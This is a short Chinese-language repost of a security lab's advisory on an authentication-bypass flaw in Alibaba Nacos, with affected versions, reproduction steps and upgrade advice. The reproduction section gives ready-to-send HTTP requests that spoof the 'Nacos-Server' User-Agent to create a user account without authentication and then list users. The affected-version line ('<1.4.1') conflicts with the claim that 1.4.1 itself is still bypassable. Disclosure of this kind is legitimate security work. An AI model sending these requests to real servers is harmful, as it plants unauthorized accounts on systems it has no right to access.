阿里Nacos安全漏洞以绕过身份验证
Posted MWH攻防实验室
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了阿里Nacos安全漏洞以绕过身份验证相关的知识,希望对你有一定的参考价值。
0x01 漏洞描述
nacos最新版本1.4.1对于User-Agent绕过安全漏洞的serverIdentity key-value修复机制,依然存在绕过问题,在nacos开启了serverIdentity的自定义key-value鉴权后,通过特殊的url构造,依然能绕过限制访问任何http接口。
0x02 漏洞影响版本
nacos< 1.4.1
0x03 漏洞复现
1、访问网站
2、构造参数
1、添加用户,密码
POST /nacos/v1/auth/users?username=test&password=test HTTP/1.1
Host: xxxx.com
User-Agent: Nacos-Server
Content-Length: 0
Accept: */*
Accept-Encoding: gzip
2、验证是否添加成功
GET /nacos/v1/auth/users?pageNo=1&pageSize=999 HTTP/1.1
Host: xxxx.com
User-Agent: Nacos-Server
Accept: */*
Accept-Encoding: gzip
3、进行登录(test/test)
4、登录成功
0x04:修复建议
2021年1月14日 Nacos 1.4.1刚发布,会直接在1.4.1进行hotfix。
请用户直接下载最新的1.4.1版本进行部署升级。
https://github.com/alibaba/nacos/releases/tag/1.4.1
以上是关于阿里Nacos安全漏洞以绕过身份验证的主要内容,如果未能解决你的问题,请参考以下文章